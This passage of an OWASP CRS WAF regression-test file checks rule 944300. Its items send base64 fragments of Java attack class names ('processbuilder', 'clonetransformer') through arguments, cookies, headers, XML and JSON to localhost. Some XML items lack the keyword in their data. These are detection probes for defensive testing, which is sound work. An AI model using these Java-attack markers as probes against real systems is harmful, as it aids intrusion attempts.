test_title: 944300-38 + desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvY2Vzc2J1aWxkZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-39 + desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-40 + desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-41 + desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-42 + desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-43 + desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-44 + desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-45 + desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-46 + desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-47 + desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb2Nlc3NidWlsZGVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-48 + desc: "Cookie name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb2Nlc3NidWlsZGVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-49 + desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb2Nlc3NidWlsZGVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-50 + desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-51 + desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-52 + desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-53 + desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-54 + desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-55 + desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-56 + desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-57 + desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-58 + desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm9jZXNzYnVpbGRlcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-59 + desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm9jZXNzYnVpbGRlcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-60 + desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm9jZXNzYnVpbGRlcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-61 + desc: "XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-62 + desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-63 + desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-64 + desc: "Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-65 + desc: "Content-Type application/json arg value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-66 + desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-67 + desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-68 + desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-69 + desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-70 + desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-71 + desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-72 + desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-73 + desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-74 + desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-75 + desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-76 + desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-77 + desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-78 + desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-79 + desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-80 + desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GNsb25ldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-81 + desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GNsb25ldHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-82 + desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GNsb25ldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-83 + desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-84 + desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-85 + desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-86 + desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-87 + desc: "Content-Type application/json arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": 